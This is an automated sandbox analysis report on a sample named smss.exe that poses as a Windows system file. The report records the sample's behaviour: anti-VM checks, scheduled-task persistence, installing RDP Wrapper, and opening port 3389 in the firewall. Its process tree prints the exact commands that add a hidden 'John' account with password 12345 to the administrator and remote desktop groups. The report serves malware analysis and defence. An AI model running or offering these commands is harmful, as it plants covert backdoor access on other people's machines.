Analysis
-
max time kernel
145s -
max time network
147s -
platform
windows11-21h2_x64 -
resource
win11-20240802-en -
resource tags
arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system -
submitted
26-08-2024 17:39
Behavioral task
behavioral1
Sample
smss.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
smss.exe
Resource
win10-20240404-en
Behavioral task
behavioral3
Sample
smss.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral4
Sample
smss.exe
Resource
win11-20240802-en
General
-
Target
smss.exe
-
Size
9.4MB
-
MD5
6fde344165a369c3586a68317279247c
-
SHA1
e39b5038f44757a7049c4ebabbd6f62deb280796
-
SHA256
90f414ca8e7fe410a19ea1be7895f8b7df55b35d4289f1bd7c8900b2c886f4b4
-
SHA512
880650d5db061a4aab3df0c99ed1871de4347fb6ed7305c596fa4b75ec57e9c7acecebeeef675ba864d727a898963fe397af08a5d71e7993289299764931349a
-
SSDEEP
196608:uQmw1JCIvqD9gd1lqFxsPE41SfWj+gzjt5s9di7aH6CcvG:uQr9qFxOE41+Wj5zjLs9U7aaRvG
Malware Config
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
smss.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ smss.exe -
Remote Service Session Hijacking: RDP Hijacking 1 TTPs 3 IoCs
Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.
Processes:
net1.exenet.execmd.exepid Process 1112 net1.exe 1188 net.exe 2916 cmd.exe -
Modifies Windows Firewall 2 TTPs 1 IoCs
Processes:
netsh.exepid Process 3964 netsh.exe -
Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs
Processes:
RDPWinst.exedescription ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" RDPWinst.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
smss.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion smss.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion smss.exe -
Executes dropped EXE 6 IoCs
Processes:
winserv.exewinserv.exeRDPWinst.exewinserv.exewinserv.exewinserv.exepid Process 1388 winserv.exe 3056 winserv.exe 1236 RDPWinst.exe 3084 winserv.exe 1092 winserv.exe 1872 winserv.exe -
Loads dropped DLL 1 IoCs
Processes:
svchost.exepid Process 3532 svchost.exe -
Processes:
resource yara_rule behavioral4/memory/4328-0-0x00007FF681930000-0x00007FF682963000-memory.dmp themida behavioral4/memory/4328-2-0x00007FF681930000-0x00007FF682963000-memory.dmp themida behavioral4/memory/4328-4-0x00007FF681930000-0x00007FF682963000-memory.dmp themida behavioral4/memory/4328-3-0x00007FF681930000-0x00007FF682963000-memory.dmp themida behavioral4/memory/4328-5-0x00007FF681930000-0x00007FF682963000-memory.dmp themida behavioral4/memory/4328-7-0x00007FF681930000-0x00007FF682963000-memory.dmp themida behavioral4/memory/4328-6-0x00007FF681930000-0x00007FF682963000-memory.dmp themida behavioral4/memory/4328-8-0x00007FF681930000-0x00007FF682963000-memory.dmp themida behavioral4/memory/4328-9-0x00007FF681930000-0x00007FF682963000-memory.dmp themida behavioral4/memory/4328-45-0x00007FF681930000-0x00007FF682963000-memory.dmp themida behavioral4/memory/4328-49-0x00007FF681930000-0x00007FF682963000-memory.dmp themida behavioral4/memory/4328-56-0x00007FF681930000-0x00007FF682963000-memory.dmp themida behavioral4/memory/4328-65-0x00007FF681930000-0x00007FF682963000-memory.dmp themida -
Processes:
smss.exedescription ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA smss.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 3 ip-api.com -
Modifies WinLogon 2 TTPs 1 IoCs
Processes:
RDPWinst.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" RDPWinst.exe -
AutoIT Executable 11 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule behavioral4/memory/4328-4-0x00007FF681930000-0x00007FF682963000-memory.dmp autoit_exe behavioral4/memory/4328-3-0x00007FF681930000-0x00007FF682963000-memory.dmp autoit_exe behavioral4/memory/4328-5-0x00007FF681930000-0x00007FF682963000-memory.dmp autoit_exe behavioral4/memory/4328-7-0x00007FF681930000-0x00007FF682963000-memory.dmp autoit_exe behavioral4/memory/4328-6-0x00007FF681930000-0x00007FF682963000-memory.dmp autoit_exe behavioral4/memory/4328-8-0x00007FF681930000-0x00007FF682963000-memory.dmp autoit_exe behavioral4/memory/4328-9-0x00007FF681930000-0x00007FF682963000-memory.dmp autoit_exe behavioral4/memory/4328-45-0x00007FF681930000-0x00007FF682963000-memory.dmp autoit_exe behavioral4/memory/4328-49-0x00007FF681930000-0x00007FF682963000-memory.dmp autoit_exe behavioral4/memory/4328-56-0x00007FF681930000-0x00007FF682963000-memory.dmp autoit_exe behavioral4/memory/4328-65-0x00007FF681930000-0x00007FF682963000-memory.dmp autoit_exe -
Drops file in System32 directory 1 IoCs
Processes:
RDPWinst.exedescription ioc Process File created C:\Windows\System32\rfxvmt.dll RDPWinst.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
smss.exepid Process 4328 smss.exe -
Drops file in Program Files directory 5 IoCs
Processes:
RDPWinst.exesvchost.exesmss.exedescription ioc Process File created C:\Program Files\RDP Wrapper\rdpwrap.ini RDPWinst.exe File created C:\Program Files\RDP Wrapper\rdpwrap.dll RDPWinst.exe File opened for modification \??\c:\program files\rdp wrapper\rdpwrap.txt svchost.exe File opened for modification C:\Program Files\RDP Wrapper smss.exe File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.ini smss.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exedescription ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
winserv.exewinserv.exeRDPWinst.exewinserv.exewinserv.exewinserv.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language winserv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language winserv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RDPWinst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language winserv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language winserv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language winserv.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
smss.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 smss.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString smss.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid Process 484 timeout.exe -
Modifies registry class 3 IoCs
Processes:
smss.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-21-3761892313-3378554128-2287991803-1000_Classes\MIME\Database smss.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset smss.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage smss.exe -
NTFS ADS 1 IoCs
Processes:
smss.exedescription ioc Process File opened for modification C:\ProgramData\Setup\winmgmts:\ smss.exe -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid Process 3220 schtasks.exe 4536 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
smss.exewinserv.exewinserv.exesvchost.exepid Process 4328 smss.exe 4328 smss.exe 4328 smss.exe 4328 smss.exe 4328 smss.exe 4328 smss.exe 4328 smss.exe 4328 smss.exe 4328 smss.exe 4328 smss.exe 4328 smss.exe 4328 smss.exe 4328 smss.exe 4328 smss.exe 4328 smss.exe 4328 smss.exe 1388 winserv.exe 1388 winserv.exe 1388 winserv.exe 1388 winserv.exe 1388 winserv.exe 1388 winserv.exe 3056 winserv.exe 3056 winserv.exe 3056 winserv.exe 3056 winserv.exe 3532 svchost.exe 3532 svchost.exe 3532 svchost.exe 3532 svchost.exe 4328 smss.exe 4328 smss.exe 4328 smss.exe 4328 smss.exe 4328 smss.exe 4328 smss.exe 4328 smss.exe 4328 smss.exe 4328 smss.exe 4328 smss.exe 4328 smss.exe 4328 smss.exe 4328 smss.exe 4328 smss.exe 4328 smss.exe 4328 smss.exe 4328 smss.exe 4328 smss.exe 4328 smss.exe 4328 smss.exe 4328 smss.exe 4328 smss.exe 4328 smss.exe 4328 smss.exe 4328 smss.exe 4328 smss.exe 4328 smss.exe 4328 smss.exe 4328 smss.exe 4328 smss.exe 4328 smss.exe 4328 smss.exe 4328 smss.exe 4328 smss.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid Process 656 -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
winserv.exewinserv.exeRDPWinst.exesvchost.exedescription pid Process Token: SeDebugPrivilege 1388 winserv.exe Token: SeTakeOwnershipPrivilege 3056 winserv.exe Token: SeTcbPrivilege 3056 winserv.exe Token: SeTcbPrivilege 3056 winserv.exe Token: SeDebugPrivilege 1236 RDPWinst.exe Token: SeAuditPrivilege 3532 svchost.exe -
Suspicious use of SetWindowsHookEx 20 IoCs
Processes:
winserv.exewinserv.exewinserv.exewinserv.exewinserv.exepid Process 1388 winserv.exe 1388 winserv.exe 1388 winserv.exe 1388 winserv.exe 3056 winserv.exe 3056 winserv.exe 3056 winserv.exe 3056 winserv.exe 3084 winserv.exe 3084 winserv.exe 3084 winserv.exe 3084 winserv.exe 1092 winserv.exe 1092 winserv.exe 1092 winserv.exe 1092 winserv.exe 1872 winserv.exe 1872 winserv.exe 1872 winserv.exe 1872 winserv.exe -
Suspicious use of WriteProcessMemory 58 IoCs
Processes:
smss.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.exeRDPWinst.execmd.exedescription pid Process procid_target PID 4328 wrote to memory of 3220 4328 smss.exe 79 PID 4328 wrote to memory of 3220 4328 smss.exe 79 PID 4328 wrote to memory of 4536 4328 smss.exe 81 PID 4328 wrote to memory of 4536 4328 smss.exe 81 PID 4328 wrote to memory of 1388 4328 smss.exe 83 PID 4328 wrote to memory of 1388 4328 smss.exe 83 PID 4328 wrote to memory of 1388 4328 smss.exe 83 PID 4328 wrote to memory of 1880 4328 smss.exe 86 PID 4328 wrote to memory of 1880 4328 smss.exe 86 PID 1880 wrote to memory of 1860 1880 cmd.exe 88 PID 1880 wrote to memory of 1860 1880 cmd.exe 88 PID 1860 wrote to memory of 2780 1860 net.exe 89 PID 1860 wrote to memory of 2780 1860 net.exe 89 PID 4328 wrote to memory of 1868 4328 smss.exe 90 PID 4328 wrote to memory of 1868 4328 smss.exe 90 PID 1868 wrote to memory of 4188 1868 cmd.exe 92 PID 1868 wrote to memory of 4188 1868 cmd.exe 92 PID 4188 wrote to memory of 1120 4188 net.exe 93 PID 4188 wrote to memory of 1120 4188 net.exe 93 PID 4328 wrote to memory of 2956 4328 smss.exe 94 PID 4328 wrote to memory of 2956 4328 smss.exe 94 PID 2956 wrote to memory of 4656 2956 cmd.exe 96 PID 2956 wrote to memory of 4656 2956 cmd.exe 96 PID 4656 wrote to memory of 4380 4656 net.exe 97 PID 4656 wrote to memory of 4380 4656 net.exe 97 PID 4328 wrote to memory of 3892 4328 smss.exe 98 PID 4328 wrote to memory of 3892 4328 smss.exe 98 PID 3892 wrote to memory of 2320 3892 cmd.exe 100 PID 3892 wrote to memory of 2320 3892 cmd.exe 100 PID 2320 wrote to memory of 3560 2320 net.exe 101 PID 2320 wrote to memory of 3560 2320 net.exe 101 PID 4328 wrote to memory of 2988 4328 smss.exe 102 PID 4328 wrote to memory of 2988 4328 smss.exe 102 PID 2988 wrote to memory of 3088 2988 cmd.exe 104 PID 2988 wrote to memory of 3088 2988 cmd.exe 104 PID 3088 wrote to memory of 1992 3088 net.exe 105 PID 3088 wrote to memory of 1992 3088 net.exe 105 PID 4328 wrote to memory of 1540 4328 smss.exe 106 PID 4328 wrote to memory of 1540 4328 smss.exe 106 PID 1540 wrote to memory of 3380 1540 cmd.exe 108 PID 1540 wrote to memory of 3380 1540 cmd.exe 108 PID 3380 wrote to memory of 776 3380 net.exe 109 PID 3380 wrote to memory of 776 3380 net.exe 109 PID 4328 wrote to memory of 2916 4328 smss.exe 110 PID 4328 wrote to memory of 2916 4328 smss.exe 110 PID 2916 wrote to memory of 1188 2916 cmd.exe 112 PID 2916 wrote to memory of 1188 2916 cmd.exe 112 PID 1188 wrote to memory of 1112 1188 net.exe 113 PID 1188 wrote to memory of 1112 1188 net.exe 113 PID 4328 wrote to memory of 1236 4328 smss.exe 115 PID 4328 wrote to memory of 1236 4328 smss.exe 115 PID 4328 wrote to memory of 1236 4328 smss.exe 115 PID 1236 wrote to memory of 3964 1236 RDPWinst.exe 119 PID 1236 wrote to memory of 3964 1236 RDPWinst.exe 119 PID 4328 wrote to memory of 1544 4328 smss.exe 121 PID 4328 wrote to memory of 1544 4328 smss.exe 121 PID 1544 wrote to memory of 484 1544 cmd.exe 123 PID 1544 wrote to memory of 484 1544 cmd.exe 123 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\smss.exe"C:\Users\Admin\AppData\Local\Temp\smss.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Checks processor information in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4328 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winsers" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC MINUTE /MO 1 /RL HIGHEST2⤵
- Scheduled Task/Job: Scheduled Task
PID:3220
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winser" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC ONLOGON /RL HIGHEST2⤵
- Scheduled Task/Job: Scheduled Task
PID:4536
-
-
C:\ProgramData\Windows Tasks Service\winserv.exe"C:\ProgramData\Windows Tasks Service\winserv.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1388 -
C:\ProgramData\Windows Tasks Service\winserv.exe"C:\ProgramData\Windows Tasks Service\winserv.exe" -second3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3056
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net user John 12345 /add2⤵
- Suspicious use of WriteProcessMemory
PID:1880 -
C:\Windows\system32\net.exenet user John 12345 /add3⤵
- Suspicious use of WriteProcessMemory
PID:1860 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user John 12345 /add4⤵PID:2780
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Администраторы" John /add2⤵
- Suspicious use of WriteProcessMemory
PID:1868 -
C:\Windows\system32\net.exenet localgroup "Администраторы" John /add3⤵
- Suspicious use of WriteProcessMemory
PID:4188 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Администраторы" John /add4⤵PID:1120
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного рабочего стола" John /add2⤵
- Suspicious use of WriteProcessMemory
PID:2956 -
C:\Windows\system32\net.exenet localgroup "Пользователи удаленного рабочего стола" John /add3⤵
- Suspicious use of WriteProcessMemory
PID:4656 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add4⤵PID:4380
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного управления" john /add" John /add2⤵
- Suspicious use of WriteProcessMemory
PID:3892 -
C:\Windows\system32\net.exenet localgroup "Пользователи удаленного управления" john /add" John /add3⤵
- Suspicious use of WriteProcessMemory
PID:2320 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного управления" john /add" John /add4⤵PID:3560
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Administrators" John /add2⤵
- Suspicious use of WriteProcessMemory
PID:2988 -
C:\Windows\system32\net.exenet localgroup "Administrators" John /add3⤵
- Suspicious use of WriteProcessMemory
PID:3088 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Administrators" John /add4⤵PID:1992
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Administradores" John /add2⤵
- Suspicious use of WriteProcessMemory
PID:1540 -
C:\Windows\system32\net.exenet localgroup "Administradores" John /add3⤵
- Suspicious use of WriteProcessMemory
PID:3380 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Administradores" John /add4⤵PID:776
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Remote Desktop Users" john /add2⤵
- Remote Service Session Hijacking: RDP Hijacking
- Suspicious use of WriteProcessMemory
PID:2916 -
C:\Windows\system32\net.exenet localgroup "Remote Desktop Users" john /add3⤵
- Remote Service Session Hijacking: RDP Hijacking
- Suspicious use of WriteProcessMemory
PID:1188 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" john /add4⤵
- Remote Service Session Hijacking: RDP Hijacking
PID:1112
-
-
-
-
C:\ProgramData\RDPWinst.exeC:\ProgramData\RDPWinst.exe -i2⤵
- Server Software Component: Terminal Services DLL
- Executes dropped EXE
- Modifies WinLogon
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1236 -
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3964
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat2⤵
- Suspicious use of WriteProcessMemory
PID:1544 -
C:\Windows\system32\timeout.exetimeout 53⤵
- Delays execution with timeout.exe
PID:484
-
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵PID:1736
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3532
-
C:\ProgramData\Windows Tasks Service\winserv.exe"C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3084
-
C:\ProgramData\Windows Tasks Service\winserv.exe"C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1092
-
C:\ProgramData\Windows Tasks Service\winserv.exe"C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1872
Network
MITRE ATT&CK Enterprise v15
Persistence
Account Manipulation
1Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Server Software Component
1Terminal Services DLL
1Privilege Escalation
Account Manipulation
1Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
1Virtualization/Sandbox Evasion
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
114KB
MD5461ade40b800ae80a40985594e1ac236
SHA1b3892eef846c044a2b0785d54a432b3e93a968c8
SHA256798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4
SHA512421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26
-
Filesize
1.4MB
MD53288c284561055044c489567fd630ac2
SHA111ffeabbe42159e1365aa82463d8690c845ce7b7
SHA256ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753
SHA512c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02
-
Filesize
2KB
MD5bc909d39981af556d07dc67178f61472
SHA1a4e5b1c5bc746435a5baf11b728e83fb8e654da0
SHA25610cf28ab39bf7ba76b91b043a007006d13d4a661fbcaad3d7820c19407b1e6a8
SHA512acf34884a865cdabfbb9a49b948ccc74fe1e158636b23e2f728c2df6fd2fb7bda0929eeddf4bf58d90b034215dafa5e2c697050c51c2f2259ff77fa02d80f51a
-
Filesize
10.2MB
MD53f4f5a6cb95047fea6102bd7d2226aa9
SHA1fc09dd898b6e7ff546e4a7517a715928fbafc297
SHA25699fd9e75e6241eff30e01c5b59df9e901fb24d12bee89c069cc6158f78b3cc98
SHA512de5c8155f426a4e55953ae85410c7d9ad84f5643c30865fc036d1270310e28754772bd0f3093444a16ef0c1fa3db6c56301746fb5e7f03ce692bfdad0c4fb688
-
Filesize
315B
MD5155557517f00f2afc5400ba9dc25308e
SHA177a53a8ae146cf1ade1c9d55bbd862cbeb6db940
SHA256f00d027b0ed99814846378065b3da90d72d76307d37b7be46f5a480f425a764e
SHA51240baee6e6b22c386886d89172ad7c17605166f992f2d364c68d90b9874ab6f7b85e0accc91e83b4fbd2ae702def365f23542f22f6be7ff2f7949496cc0ba8a32
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e